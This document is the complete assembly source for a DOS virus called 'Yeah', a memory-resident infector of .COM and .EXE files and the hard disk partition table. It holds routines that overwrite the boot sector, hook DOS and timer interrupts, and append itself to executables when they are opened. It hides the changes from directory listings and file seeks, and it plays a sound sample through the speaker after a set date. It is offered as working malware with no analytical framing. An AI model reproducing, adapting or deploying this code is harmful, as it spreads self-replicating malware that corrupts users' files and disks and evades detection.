; Virus Name:  Yeah   
; Origin:      Holland
; Eff Length:  4,096 bytes
; Type Code:   PRhE - Parasitic Resident .EXE & partition table infector
; This program is assembled with TASM V1.01 from Borland International
; (assembing with MASM V5.10 from Microsoft Inc. is also possible).
; TASM stealth;
; LINK stealth,,stealth;
; Interrupt vectors

iseg segment at 0
		org	8*4
Int8o		dw	0			; interrupt vector 21h
Int8s		dw	0

		org	1ch*4
Int1Co		dw	0			; interrupt vector 21h
Int1Cs		dw	0

		org	21h*4
Int21o		dw	0			; interrupt vector 21h
Int21s		dw	0

iseg ends

cseg segment public 'code'
		assume	cs:cseg,ds:cseg,es:cseg

; Header of EXE-file

VirusSize	equ	10d0h			; size of virus
PrgSize		equ	72h			; size of prg after the virus

Signature	dw	0			; signature 'MZ'
PartPage	dw	0			; size of partitial page
PageCount	dw	0			; number of pages
ReloCount	dw	0			; number of relocation items
HeaderSize	dw	0			; size of header
MinMem		dw	0			; minimum memory needed
MaxMem		dw	0			; maximum memory needed
ExeSS		dw	0			; initial SS 
ExeSP		dw	0 			; initial SP
CheckSum	dw	0			; unused ???
ExeIP		dw	0			; initial IP
ExeCS		dw	0			; initial CS
ReloOffset	dw	0			; offset of relocationtable
OverlayNr	dw	0			; number of overlay

ComSize		dw	-1			; Size of com-file (-1 for exe)

; This procedure is called when starting from an exe-file

Main:		pushf				; save flags
		sub	sp,4			; reserve space far cs:ip
		push	ax			; save other registers
		push	ds
		push	es
		sti				; enable interrupts
		cmp	cs:ComSize,-1		; com or exe-file
		je	ExeFile			; -1 : exe-file
ComFile:	mov	word ptr ds:[6],0fef0h	; set availeble memory to max
		mov	bp,sp			; set cs:ip on stack for
		mov	word ptr [bp+8],ds	;   returning to the orginal
		mov	word ptr [bp+6],100h	;   program
		mov	bp,ds			; bp : stacksegment
		mov	ax,cs			; bx : begin of com-file
		add	ax,(VirusSize/10h)
		mov	bx,ax
		mov	cx,0ff0h		; cx : size of data to move
		add	ax,cx			; es : buffer for mover and
		mov	es,ax			;      infecting the bootsect.
		push	cs			; ds : codesegment
		pop	ds
		jmp	short InfectBoot	; infect bootsector
ExeFile:	mov	dx,cs			; Relocation
		add	dx,(VirusSize/10h)
		mov	ds,dx
		mov	cx,ReloCount		; number of relocation items
		add	dx,HeaderSize		; size of exe-header
		mov	si,ReloOffset		; offset of 1st relocation item
		jcxz	NoRelo
NextRelo:	lodsw				; offset
		mov	di,ax
		lodsw				; segment
		add	ax,dx
		mov	es,ax
		mov	ax,cs			; relocation factor
		add	es:[di],ax
		loop	NextRelo		; next relocation item
NoRelo:		mov	bp,sp
		mov	ax,cs			; set cs:ip on stack for
		add	ax,ExeCS		;  returning to the orginal
		mov	[bp+8],ax		;  program
		mov	ax,ExeIP
		mov	[bp+6],ax
		mov	bp,cs			; bp : stacksegment
		add	bp,ExeSS
		mov	ax,PageCount		; calculate size of exe-file
		mov	dx,PartPage		; in paragraphs
		add	dx,-1
		sbb	ax,0
		mov	cl,4
		shr	dx,cl
		inc	dx
		inc	cl
		shl	ax,cl
		add	dx,ax
		add	dx,MinMem		; dx : size of exe-file
		mov	cx,dx			; cx : size of code and data
		sub	cx,HeaderSize
		mov	bx,cs			; bx : start of code and data
		mov	ds,bx
		add	bx,(VirusSize/10h)
		add	bx,dx
		mov	es,bx			; es : buffer for mover and
		sub	bx,cx			;      infecting the bootsect.
InfectBoot:	push	bx			; save bx and cx
		push	cx
		mov	ax,201h			; read bootsector from disk
		xor	bx,bx
		mov	cx,1
		mov	dx,80h
		int	13h
		jc	BootOk			; error ?
		mov	si,offset BootSector	; compare with infected code
		xor	di,di
		mov	cx,1*BootSize
		repe	cmpsb
		je	BootOk			; equal ?
		mov	di,1beh+8		; check partitions, we don't 
		mov	cx,4			; want to overwrite them
NextPartition:	cmp	word ptr es:[di+2],0
		ja	SectOk
		cmp	word ptr es:[di],(VirusSize+1ffh)/200h+1
		ja	SectOk
		cmp	word ptr es:[di],0
		ja	BootOk
SectOk:		add	di,10h
		loop	NextPartition
		mov	si,offset BootSector	; exchange code from bootsector
		xor	di,di			; with viral code
		mov	cx,1*BootSize
		call	Swapsb
		push	es			; write virus to disk
		pop	ds
		push	cs
		pop	es
		mov	ax,(VirusSize+1ffh)/200h+300h
		mov	cx,2
		int	13h
		push	ds
		pop	es
		push	cs
		pop	ds
		jc	BootOk			; error ?
		mov	ax,301h			; write bootsector to disk
		mov	cx,1
		int	13h
BootOk:		pop	cx			; restore bx and cx
		pop	bx
		mov	dx,cs			; dx = destenation segment
		xor	di,di
		push	es			; push seg:ofs of mover
		push	di
		push	cx			; save cx
		mov	cx,1*MoverSize
		mov	si,offset Mover
		cld					; copy mover-procedure
		rep	movsb
		pop	cx			; restore cx
		cli				; disable interrupts
		retf				; jump to mover

Mover:		mov	ax,cx			; save cx
		mov	ds,bx			; ds:si = source
		mov	es,dx			; es:di = destenation
		xor	si,si
		xor	di,di
		mov	cx,8h			; copy one paragraph
		rep	movsw
		inc	bx
		inc	dx
		mov	cx,ax			; restore cx
		loop	Mover			; next paragraph
		mov	ss,bp			; ss = new stacksegment
		sti				; enable interrupts
		pop	es			; restore registers
		pop	ds
		pop	ax
		iret				; jump to program

MoverSize	equ	($-Mover)

; Bootsector startup

Bootsector:	cli				; disable interrupts
		xor	bx,bx			; setup stack and ds
		mov	ds,bx
		mov	ss,bx
		mov	sp,7c00h
		sti				; enable interrupts
		mov	ax,ds:[413h]		; get size of base memory
		sub	ax,(VirusSize+3ffh)/400h; subtract virussize
		mov	ds:[413h],ax		; store new memory size
		mov	cl,6			; calculate segment
		shl	ax,cl
		mov	es,ax			; load virus in reserved mem
		mov	ax,(VirusSize+1ffh)/200h+200h
		mov	cx,2
		mov	dx,80h
		int	13h
		mov	bx,offset StartUp	; bx=offset startup
		push	es			; jump to startup (es:bx)
		push	bx

BootSize	equ	($-Bootsector)		; size of bootsector part

StartUp:	cli					; disable interrupts
		mov	ax,offset Interrupt1C		; hack interrupt 1C
		xchg	ax,ds:Int1Co
		mov	cs:OldInt1Co,ax
		mov	ax,cs
		xchg	ax,ds:Int1Cs
		mov	cs:OldInt1Cs,ax
		mov	cs:OldInt21o,-1
		mov	cs:OldInt21s,-1
		mov	cs:Count,-1
		sti				; enable interrupts
		push	cs			; ds=cs
		pop	es
		mov	si,7c00h		; di=7c00h (Bootsector)
		mov	di,offset BootSector	; si=BootSector
		mov	cx,1*BootSize		; bytes to copy
		cld				; copy forward
		call	Swapsb			; restore orginal boot
		mov	ax,7c00h		; offset bootsector
		push	ds			; jump to bootsector
		push	ax

Interrupt8:	push	ax			; save registers
		push	si
		push	ds
		push	cs
		pop	ds
		mov	si,SampleOffset		; get offset of next bit
		dec	byte ptr ds:SampleBit
		test	byte ptr ds:SampleBit,7
		jnz	OfsOk
		inc	si
		cmp	si,offset SampleEnd	; end of sample ?
		jb	OfsOk			; no, play bit
		mov	al,34h			; reset int 8 frequency
		out	43h,al
		xor	ax,ax
		out	40h,al
		out	40h,al
		mov	ds,ax			; reset int 8 vector
		mov	ax,cs:OldInt8o
		mov	ds:Int8o,ax
		mov	ax,cs:OldInt8s
		mov	ds:Int8s,ax		
		inc	byte ptr cs:SampleFlag	; set sample ready flag
		jmp	short ExitInt8		; end of interrupt
OfsOk:		mov	SampleOffset,si		; store offset
		rol	byte ptr ds:[si],1	; next bit
		mov	ah,ds:[si]		; get bit value
		and	ah,1
		shl	ah,1
		in	al,61h			; get value of io-port 61h
		and	al,0fch			; reset last 2 bits
		or	al,ah			; set bit 2 with sample value
		out	61h,al			; write to io-port 61h
ExitInt8:	mov	al,20h			; end of interrupt signal
		out	20h,al
		pop	ds			; restore registers
		pop	si
		pop	ax
		iret				; return to program

Interrupt1C:	push	ds			; save registers
		push	ax
		push	bx
		xor	ax,ax			; interrupts vectors
		mov	ds,ax
		mov	ax,ds:Int21o
		cmp	cs:OldInt21o,ax
		jne	Changed
		mov	ax,ds:Int21s
		cmp	cs:OldInt21s,ax
		je	Equal
Changed:	mov	ax,ds:Int21o
		mov	cs:OldInt21o,ax
		mov	ax,ds:Int21s
		mov	cs:OldInt21s,ax
		mov	cs:Count,182
		jmp	short NotReady
Equal:		dec	cs:Count
		jnz	NotReady
		mov	ax,cs:OldInt1Co		; restore vector 1C
		mov	ds:Int1Co,ax		; (This interrupt)
		mov	ax,cs:OldInt1Cs
		mov	ds:Int1Cs,ax
		mov	ax,offset Interrupt21	; Hack interrupt 21
		xchg	ax,ds:Int21o
		mov	cs:OldInt21o,ax
		mov	ax,cs
		xchg	ax,ds:Int21s
		mov	cs:OldInt21s,ax
		mov	ax,8
		mov	bx,offset Handle
NextHandle:	mov	word ptr cs:[bx],0
		inc	bx
		inc	bx
		dec	ax
		jnz	NextHandle
		mov	byte ptr cs:Active,-1
NotReady:	pop	bx
		pop	ax			; restore registers
		pop	ds
		jmp	cs:OldInt1C		; do orginal int 1C

Swapsb:		mov	al,es:[di]		; exchange two memory bytes
		xchg	al,ds:[si]
		inc	si
		loop	Swapsb			; next byte
		ret				; return

; Manipilated functions

Functions	db	11h				; 1
		dw	offset FindFCB
		db	12h				; 2
		dw	offset FindFCB
		db	30h				; 3
		dw	offset DosVersion
		db	3ch				; 4
		dw	offset Open
		db	3dh				; 5
		dw	offset Open
		db	3eh				; 6
		dw	offset Close
		db	42h				; 7
		dw	offset Seek
		db	45h				; 8
		dw	offset Duplicate
		db	46h				; 9
		dw	offset Redirect
		db	4eh				; 10
		dw	offset Find
		db	4fh				; 11
		dw	offset Find
		db	5bh				; 12
		dw	offset Open
		db	6ch				; 13
		dw	offset OpenCreate

FunctionCount	equ	13

; The orginal interrupt 21h is redirected to this procedure

DosVersion:	push	ax
		push	cx
		push	dx
		push	ds
		push	cs
		pop	ds
		cmp	cs:Active,0
		je	NotActive
		mov	ah,2ah
		call	DOS
		cmp	ActiveYear,cx
		jb	NotActive
		cmp	ActiveDate,dx
		jb	NotActive
		xor	ax,ax
		mov	ds,ax
		mov	ax,offset Interrupt8
		xchg	ax,ds:Int8o
		mov	cs:OldInt8o,ax
		mov	ax,cs
		xchg	ax,ds:Int8s
		mov	cs:OldInt8s,ax
		mov	al,34h
		out	43h,al
		mov	al,80h
		out	40h,al
		mov	al,0
		out	40h,al
		push	cs
		pop	ds
		mov	byte ptr SampleFlag,0
		mov	byte ptr SampleBit,0
		mov	word ptr SampleOffset,offset SampleData
Delay:		cmp	byte ptr SampleFlag,0
		je	Delay
		mov	byte ptr Active,0
NotActive:	pop	ds
		pop	dx
		pop	cx
		pop	ax
		jmp	Old21

FindFCB:	call	DOS			; call orginal interrupt
		cmp	al,0			; error ?
		jne	Ret1
		pushf				; save registers
		push	ax
		push	bx
		push	es
		mov	ah,2fh			; get DTA
		call	DOS
		cmp	byte ptr es:[bx],-1	; extended fcb ?
		jne	FCBOk
		add	bx,8			; yes, skip 8 bytes
FCBOk:		mov	al,es:[bx+16h]		; get file-time (low byte)
		and	al,1fh			; seconds
		cmp	al,1fh			; 62 seconds ?
		jne	FileOk			; no, file not infected
		sub	word ptr es:[bx+1ch],VirusSize
		sbb	word ptr es:[bx+1eh],0	; adjust file-size
		jmp	short Time

Find:		call	DOS			; call orginal interrupt
		jc	Ret1			; error ?
		pushf				; save registers
		push	ax
		push	bx
		push	es
		mov	ah,2fh
		call	DOS
		mov	al,es:[bx+16h]		; get file-time (low byte)
		and	al,1fh			; seconds
		cmp	al,1fh			; 62 seconds ?
		jne	FileOk			; no, file not infected
		sub	word ptr es:[bx+1ah],VirusSize
		sbb	word ptr es:[bx+1ch],0	; change file-size
Time:		xor	byte ptr es:[bx+16h],1fh; adjust file-time
FileOk:		pop	es			; restore registers
		pop	bx
		pop	ax
Ret1:		retf	2			; return

Seek:		or	bx,bx			; bx=0 ?
		jz	Old21			; yes, do orginal interrupt
		push	bx
		call	FindHandle
		pop	bx
		jc	Old21
Stealth:	or	al,al			; seek from top of file ?
		jnz	Relative		; no, don't change cx:dx
		add	dx,VirusSize		; change cx:dx
		adc	cx,0
Relative:	call	DOS			; Execute orginal int 21h
		jc	Ret1			; Error ?
		sub	ax,VirusSize		; adjust dx:ax
		sbb	dx,0
		jmp	short Ret1		; return

Close:		or	bx,bx			; bx=0 ?
		je	Old21			; yes, do orginal interrupt
		push	ax
		push	cx
		push	dx
		push	si
		push	ds
		push	cs			; ds=cs
		pop	ds
		push	bx
		call	FindHandle
		mov	si,bx
		pop	bx
		jc	NotStealth
		mov	word ptr ds:[si],0
		call	UpdateHeader
NotStealth:	pop	ds			; restore registers
		pop	si
		pop	dx
		pop	cx
		pop	ax
Not2:		jmp	short Old21		; continue with orginal int

Interrupt21:	push	bx			; after an int 21h instruction
		push	cx			; this procedure is started
		mov	bx,offset Functions
		mov	cx,FunctionCount
NxtFn:		cmp	ah,cs:[bx]		; search function
		je	FunctionTrap
		add	bx,3
		loop	NxtFn
		pop	cx			; function not found
		pop	bx
Old21:		jmp	cs:OldInt21

FunctionTrap:	push	bp			; function found, start viral
		mov	bp,sp			; version of function
		mov	bx,cs:[bx+1]
		xchg	bx,[bp+4]
		mov	cx,[bp+10]
		xchg	cx,[bp+2]
		pop	bp

Duplicate:	call	DOS
		jc	Error
		push	bx
		call	FindHandle
		jc	Ret3
		mov	bx,ax
		call	StoreHandle
Ret3:		pop	bx
		jmp	Ret2

Redirect:	call	DOS
		jc	Error
		push	bx
		push	cx
		xchg	bx,cx
		call	FindHandle
		jc	Ret4
		mov	cs:[bx],cx
Ret4:		pop	cx
		pop	bx
		jmp	Ret2

OpenCreate:	or	al,al			; extended open/create function
		jne	Old21			; no, do orginal interrupt 21
		push	dx			; save dx
		mov	dx,si			; check extension of filename
		call	CheckName
		pop	dx			; retore dx
		jc	Old21			; exe or com-file?
		jmp	short ExtensionOk	; yes, infect file or use
						; stealth

Open:		call	CheckName		; exe or com-file ?
		jc	Old21			; no, do orginal int 21
ExtensionOk:	call	DOS			; do interrupt 21
		jnc	NoError			; error ?
Error:		jmp	Ret2			; yes, return and do nothing
NoError:	pushf				; save registers
		push	ax
		push	bx
		push	cx
		push	dx
		push	ds
		push	cs
		pop	ds
		mov	bx,ax			; bx = file handle
		mov	ax,4400h		; get device information
		call	DOS
		jc	PopRet			; error ?
		test	dx,80h			; character device
		jnz	PopRet			; yes, return and do nothing
		call	EndOfFile		; get file size
		or	ax,dx			; 0 ?
		jnz	FileExists		; no, file already existed
FileCreated:	call	HandleFree
		jc	PopRet
		mov	ah,2ah
		call	DOS
		add	dh,3
		cmp	dh,12
		jbe	DateOk
		inc	cx
		sub	dh,12
DateOk:		mov	ActiveYear,cx
		mov	ActiveDate,dx
		mov	ah,40h			; write virus to file
		mov	cx,VirusSize
		call	Zero2
		jc	NoVir			; error ? yes, return
		xor	ax,cx			; entire virus written ?
		jnz	NoVir			; no, return
		call	StoreHandle
		jmp	short PopRet		; return
FileExists:	call	TopOfFile		; go to top of file
		call	HandleFree
		jc	PopRet			; no, do nothing
		call	ReadHeader		; read exe-header
		jc	NoVir			; error ?
		xor	ax,cx			; entire header read
		jne	NoVir			; no, not infected
		cmp	Signature,5a4dh		; signature = 'MZ' ?
		jne	NoVir			; no, not infected
		cmp	HeaderSize,ax		; headersize = 0 ?
		jne	NoVir			; no, not infected
		cmp	CheckSum,0DEADh		; checksum = DEAD hex
		jne	NoVir			; no, not infected
		call	StoreHandle
		mov	dx,VirusSize		; seek to end of virus
		jmp	short Infected
NoVir:		xor	dx,dx
Infected:	xor	cx,cx			; go to end of virus if file
		mov	ax,4200h		; is infected
		call	DOS
PopRet:		pop	ds			; restore registers
		pop	dx
		pop	cx
		pop	bx
		pop	ax
Ret2:		retf	2			; return


EndOfFile:	mov	ax,4202h		; go to end of file
		jmp	short Zero1

TopOfFile:	mov	ax,4200h		; go to top of file
Zero1:		xor	cx,cx
		jmp	short Zero2

WriteHeader:	mov	ah,40h			; write exe-header to file
		jmp	short Hdr

ReadHeader:	mov	ah,3fh			; read exe-header from file
Hdr:		mov	cx,1eh
Zero2:		xor	dx,dx

DOS:		pushf				; call orginal interrupt
		call	cs:OldInt21

FindHandle:	push	ax
		push	cx
		mov	ax,bx
		mov	bx,offset Handle
		mov	cx,8
NotFound:	cmp	ax,cs:[bx]
		je	Found
		inc	bx
		inc	bx
		loop	NotFound
Found:		pop	cx
		pop	ax

HandleFree:	push	bx
		xor	bx,bx
		call	FindHandle
		pop	bx

StoreHandle:	push	bx
		push	bx
		xor	bx,bx
		call	FindHandle
		pop	cs:[bx]
		pop	bx

CheckName:	push	ax			; check for .exe or .com
		push	cx			; save registers
		push	si
		push	di
		xor	ah,ah			; point found = 0
		mov	cx,100h			; max length filename = 100h
		mov	si,dx			; si = start of filename
NxtChr:		lodsb				; get byte
		or	al,al			; 0 ?
		je	EndName			; yes, check extension
		cmp	al,'\'			; \ ?
		je	Slash			; yes, point found = 0
		cmp	al,'.'			; . ?
		je	Point			; yes, point found = 1
		loop	NxtChr			; next character
		jmp	short EndName		; check extension
Slash:		xor	ah,ah			; point found = 0
		jmp	NxtChr			; next character
Point:		inc	ah			; point found = 1
		mov	di,si			; di = start of extension
		jmp	NxtChr			; next character
EndName:	cmp	ah,1			; point found = 0
		jne	NotExe			; yes, not an exe-file
		mov	si,di			; si = start of extension
		lodsw				; first 2 characters
		and	ax,0dfdfh		; uppercase
		mov	cx,ax
		lodsb				; 3rd character
		and	al,0dfh			; uppercase
		cmp	cx,04f43h		; extension = .com ?
		jne	NotCom
		cmp	al,04dh
		je	ChkRet
NotCom:		cmp	cx,05845h		; extension = .exe ?
		jne	NotExe
		cmp	al,045h
		je	ChkRet
NotExe:		stc				; set carry flag
ChkRet:		pop	di			; restore registers
		pop	si
		pop	cx
		pop	ax
		ret				; return

UpdateHeader:	mov	ax,4200h		; position read/write pointer
		xor	cx,cx			; at the end of the virus
		mov	dx,VirusSize
		call	DOS
		call	ReadHeader		; read orginal exe-header
		cmp	Signature,5a4dh
		je	InfectExe
InfectCom:	mov	Signature,5a4dh
		mov	ReloOffset,01ch
		mov	OverlayNr,0
		mov	ExeSS,(VirusSize-100h)/10h
		mov	ExeSP,0fffeh
		call	EndOfFile
		sub	ax,VirusSize
		sbb	dx,0
		mov	ComSize,ax
		mov	cx,10h
		div	cx
		sub	dx,1
		mov	dx,0ff2h+20h
		sbb	dx,ax
		mov	MinMem,dx
		jmp	WriteIt
InfectExe:	mov	ComSize,-1
		mov	ax,(VirusSize/10h)
		add	ax,HeaderSize
		add	ExeSS,ax
		add	MinMem,20h
		add	MaxMem,20h
		jnc	MaxOk
WriteIt:	mov	MaxMem,0ffffh
MaxOk:		mov	ReloCount,0
		mov	HeaderSize,0
		mov	CheckSum,0DEADh
		mov	ExeCS,0
		mov	ExeIP,offset Main
		call	EndOfFile
		mov	cx,200h
		div	cx
		mov	PartPage,dx
		add	dx,-1
		adc	ax,0
		mov	PageCount,ax
		call	TopOfFile
		call	WriteHeader		; write header at the top of
		jc	InfErr			; the virus
		mov	ax,5700h
		call	DOS
		mov	ax,5701h
		or	cl,1fh
		call	DOS
InfErr:		ret

; Data to generate the 123 yeah sound

SampleData	db	07dh,075h,05fh,0ffh,0ffh,0ffh,0ffh,0a0h,03fh,007h,0f8h,03ch,007h,0e0h,07fh,003h
		db	0c0h,0f8h,00fh,0c0h,0f0h,07ch,00fh,0c0h,0f8h,0f0h,01fh,081h,0ffh,081h,0fch,00ch
		db	07eh,007h,0f0h,071h,0f0h,03fh,007h,00fh,083h,0f0h,071h,0f8h,03fh,007h,01fh,003h
		db	0e0h,0e3h,0e0h,07ch,000h,0fch,00fh,080h,03fh,003h,0e0h,01fh,0c0h,0fch,007h,0f0h
		db	03fh,003h,0f8h,00fh,0c0h,0feh,003h,0f0h,07fh,001h,0f8h,03fh,0c0h,07eh,007h,0fch
		db	03fh,001h,0f8h,01eh,01fh,002h,03eh,00fh,0c0h,03fh,007h,0f0h,01fh,007h,0fch,00fh
		db	082h,0ffh,00fh,086h,00fh,038h,03eh,004h,03ch,01fh,008h,03eh,01fh,008h,03eh,00fh
		db	000h,07ch,00fh,080h,07ch,007h,0e0h,078h,0e1h,0f0h,0f0h,0e1h,0f0h,0f0h,0f0h,0f1h
		db	0e1h,0f0h,0e1h,0e1h,0f0h,0e3h,0c3h,0f0h,0cfh,007h,0f0h,01eh,00fh,0f0h,03eh,01eh
		db	078h,03ch,01ch,078h,038h,03ch,078h,078h,07ch,070h,0f0h,078h,0e1h,0c0h,070h,0c3h
		db	058h,061h,08eh,078h,0e3h,01ch,071h,0c6h,03ch,0e3h,08eh,030h,0e7h,01ch,071h,0c6h
		db	038h,0e1h,08eh,038h,0e3h,09ch,071h,0c7h,01ch,0f1h,0c7h,018h,0e3h,007h,038h,0e7h
		db	00fh,000h,0efh,00fh,001h,0e6h,00fh,0c1h,0e3h,01eh,003h,0e3h,08eh,0e1h,0dfh,087h
		db	0e1h,0c3h,0c6h,070h,07fh,003h,0f0h,073h,0f0h,03eh,007h,0ech,007h,0e0h,078h,070h
		db	07eh,00fh,00fh,007h,0c2h,063h,0e0h,07eh,008h,0f8h,01fh,080h,03eh,003h,0f0h,01fh
		db	080h,0fch,007h,0f0h,03fh,001h,0f8h,00fh,0c0h,0feh,003h,0f0h,01fh,0c0h,0f8h,01fh
		db	0e0h,07ch,01fh,0f0h,03eh,00fh,080h,01fh,00fh,0f0h,01fh,007h,0d0h,00fh,007h,0c3h
		db	00fh,007h,082h,00fh,007h,0c0h,00fh,007h,0c3h,00fh,007h,080h,00fh,007h,00ah,01fh
		db	00fh,08eh,01eh,01eh,00eh,03ch,01eh,01ch,03ch,03ch,018h,078h,07ch,018h,0f0h,078h
		db	0f1h,0f0h,0f0h,0e1h,0e1h,0e0h,0c3h,0c3h,0e1h,0c7h,083h,0c3h,08fh,00fh,003h,01eh
		db	01eh,00eh,01ch,03eh,01ch,078h,078h,038h,0f0h,0f0h,031h,0e1h,0ech,063h,0c3h,0c8h
		db	0c7h,087h,0f1h,08fh,00ch,0e3h,01eh,01bh,0c7h,01ch,027h,08eh,038h,047h,01ch,079h
		db	08eh,038h,071h,01eh,038h,0f2h,01ch,070h,0d6h,038h,0f1h,0c0h,038h,0f1h,0e0h,078h
		db	001h,0e4h,07dh,0f0h,0e0h,018h,018h,0f6h,03ch,088h,070h,01fh,0ech,078h,006h,004h
		db	03fh,087h,0f2h,01ch,083h,0fbh,01fh,0e1h,0f8h,007h,0f0h,0ffh,0c3h,0f8h,003h,0c0h
		db	0ffh,001h,0f8h,007h,080h,03fh,001h,0e0h,00ch,086h,07ch,063h,0c0h,01fh,060h,0fch
		db	023h,080h,038h,003h,0e0h,038h,0c0h,018h,0c7h,0f8h,0c7h,000h,000h,001h,0c7h,0b8h
		db	060h,008h,006h,01fh,0c7h,018h,002h,030h,00eh,03ch,01ch,000h,000h,001h,0f8h,01ch
		db	001h,087h,081h,0e1h,080h,0cch,006h,000h,0c6h,060h,000h,008h,007h,080h,000h,020h
		db	0e2h,000h,000h,020h,008h,008h,063h,0ech,004h,023h,024h,062h,08ch,0abh,052h,02dh
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		db	034h,0cdh,0a8h,044h,098h,0f6h,024h,003h,07fh,0a0h,040h,01bh,0feh,000h,00bh,0ffh
		db	080h,001h,0ffh,0c0h,000h,0ffh,0f0h,000h,07fh,0f8h,000h,03fh,0f8h,000h,03fh,0f0h
		db	000h,03fh,0f8h,000h,03fh,0f0h,000h,07fh,0c0h,003h,0ffh,0c0h,003h,0ffh,000h,005h
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		db	03fh,0ffh,080h,03fh,0ffh,000h,047h,0f9h,082h,007h,0e7h,08ch,00fh,09fh,070h,03eh
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		db	080h,0e3h,07eh,003h,0c6h,0fch,007h,083h,0f8h,00eh,007h,0f0h,01ch,06fh,0c0h,078h
		db	01fh,0c0h,0f1h,07fh,001h,0e0h,0ffh,003h,0c1h,0feh,003h,083h,0fch,007h,007h,0f8h
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		db	039h,0e1h,018h,07bh,0c2h,038h,073h,0c3h,038h,0f3h,086h,038h,0e7h,086h,070h,0e3h
		db	086h,070h,0e3h,084h,070h,0e3h,086h,070h,0e7h,08ch,070h,0e7h,08eh,070h,0e3h,086h
		db	071h,0c3h,086h,078h,0e3h,080h,079h,0e3h,082h,038h,0f1h,0c3h,01ch,0f9h,0c3h,01ch
		db	078h,0c1h,01eh,078h,0e1h,08fh,03ch,070h,08fh,03ch,030h,067h,08eh,038h,073h,086h
		db	018h,07bh,087h,08eh,03ch,0e3h,08fh,038h,060h,0e7h,08ch,038h,0f3h,087h,00eh,078h
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		db	000h,0f1h,0e7h,007h,01ch,078h,0c7h,01eh,078h,070h,0c7h,08eh,030h,067h,0c7h,08eh
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		db	00fh,0f3h,0c3h,086h,03ch,0f0h,018h,05fh,03eh,030h,0f1h,087h,0c6h,00fh,0f0h,0e3h
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		db	00eh,038h,073h,0ddh,019h,0f1h,007h,03ch,070h,0e7h,008h,078h,0c3h,00eh,078h,023h
		db	08eh,018h,073h,0c7h,09eh,030h,0c3h,08eh,018h,0f1h,0c7h,00ch,070h,0e3h,08eh,03ch
		db	071h,0c3h,01ch,038h,0e1h,08fh,01ch,070h,0c7h,08eh,038h,061h,0c7h,01eh,038h,0e1h
		db	08fh,01ch,071h,0e7h,08ch,038h,0e3h,0c6h,01ch,078h,0e1h,00eh,01ch,078h,0c7h,08eh
		db	03ch,031h,0c3h,08fh,028h,070h,0e3h,086h,01ch,038h,0f1h,087h,00eh,038h,071h,0c3h
		db	08fh,01ch,078h,0e1h,0c3h,00eh,01ch,078h,0e1h,0c3h,08eh,01ch,078h,071h,0c1h,08fh
		db	08fh,0f8h,03dh,0f8h,018h,007h,0feh,002h,007h,0feh,006h,003h,0ffh,083h,0c1h,0ffh
		db	0c1h,081h,0f7h,0d1h,0c0h,0ffh,0c0h,0c1h,0f3h,0e1h,0c1h,0f7h,0e0h,0c1h,0e3h,0e1h
		db	0c1h,0e3h,0c1h,0c1h,0e3h,0c3h,083h,0c7h,083h,083h,0c7h,087h,007h,08fh,086h,00fh
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		db	0e1h,0f3h,083h,087h,0deh,006h,00fh,03eh,01ch,03ch,07ch,038h,07ch,0f8h,060h,0ffh
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		db	00fh,00fh,00fh,00eh,01eh,01eh,01ch,01eh,03eh,00ch,03ch,03eh,00ch,03ch,03eh,01ch
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		db	0c0h,047h,0c7h,0c1h,08fh,00fh,086h,01eh,00fh,018h,078h,01ch,061h,0fch,071h,08eh
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		db	03eh,038h,07ch,07ch,060h,070h,079h,081h,0e0h,0e2h,063h,0c1h,0c1h,0c3h,087h,0c7h
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		db	027h,0f7h,020h,01bh,0ffh,0c0h,00eh,0f7h,060h,011h,0ffh,0c0h,006h,0ffh,080h,001h
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		db	006h,0ffh,0f0h,000h,01eh,0f1h,0dbh,080h,000h,037h,0f0h,000h,027h,0f3h,040h,04eh
		db	0e7h,000h,04fh,0c6h,000h,0dfh,0ceh,080h,09dh,0cch,001h,09fh,0c4h,000h,09fh,0fch
		db	001h,09fh,080h,000h,0bfh,0c8h,080h,09dh,0cch,080h,0ceh,0e4h,040h,04eh,0ffh,022h
		db	027h,072h,010h,013h,0bbh,098h,00dh,0dch,084h,002h,077h,062h,001h,0bbh,0b0h,080h
		db	04eh,0ech,040h,01bh,0bbh,010h,006h,0eeh,042h,000h,09dh,0d8h,080h,013h,0bbh,000h
		db	002h,077h,062h,004h,06eh,0e4h,020h,00ch,0eeh,0c0h,000h,0cch,0ech,000h,00ch,0eeh
		db	0c0h,000h,06eh,0f4h,000h,006h,077h,040h,002h,033h,0feh,080h,018h,0dfh,0f0h,000h
		db	046h,07fh,0c0h,023h,01bh,0f6h,000h,00ch,0ffh,0d8h,010h,031h,07eh,070h,03ch,00fh
		db	0e0h,0f8h,01fh,081h,0f0h,03eh,007h,0c0h,0f0h,03eh,003h,003h,0f0h,038h,03fh,003h
		db	081h,0f0h,03ch,01fh,081h,0c1h,0f0h,01ch,00fh,081h,0e0h,0f8h,01eh,00fh,080h,0e0h
		db	07fh,07fh,0ffh,0ffh,0ffh,0ffh,0ffh,0feh,06ch,092h,0d9h,0a6h,0c6h,082h,0c8h,032h
		db	049h,000h,083h,07fh,0b0h,000h,016h,0ffh,0a0h,000h,05fh,0fdh,080h,042h,0bfh,0f0h
		db	082h,009h,02dh,010h,080h,099h,06bh,040h,006h,0cah,0a0h,000h,0bdh,0b4h,000h,050h
		db	0b4h,001h,0d1h,0a4h,081h,0d3h,046h,096h,0d6h,0a2h,049h,0dbh,040h,0b7h,0f4h,083h
		db	06dh,0e9h,026h,0f1h,0f2h,027h,0f3h,0a4h,0b7h,063h,060h,01fh,0c7h,0f1h,036h,0cfh
		db	0b0h,03eh,00dh,0b0h,07eh,00bh,0d0h,07bh,01bh,0c0h,07ch,01bh,064h,06ch,01fh,024h
		db	064h,00dh,036h,066h,04dh,093h,023h,06dh,01bh,003h,02dh,09dh,007h,085h,09dh,087h
		db	0c4h,08eh,087h,0c4h,0c6h,0c3h,0c4h,0c7h,043h,066h,043h,003h,0e6h,043h,081h,0b2h
		db	065h,081h,0b2h,061h,081h,0b3h,063h,081h,0d3h,033h,0c1h,0f1h,031h,091h,0b1h,033h
		db	0b1h,0f1h,033h,0a1h,0e1h,023h,021h,0e1h,023h,063h,063h,066h,066h,0e3h,066h,0e4h
		db	0c7h,04dh,0cdh,08fh,013h,05bh,09eh,066h,064h,0ech,0cch,0c9h,0ddh,099h,091h,0bbh
		db	017h,04fh,0d8h,02eh,00fh,032h,07eh,01eh,068h,0f8h,079h,091h,0f0h,0f7h,046h,0c5h
		db	0deh,09fh,09fh,0edh,07ch,02fh,0b3h,034h,05eh,04ch,099h,0b9h,0bbh,032h,0cah,0cch
		db	0dbh,009h,013h,00dh,034h,02eh,064h,0d8h,0b9h,0a1h,023h,064h,08ch,08dh,092h,032h
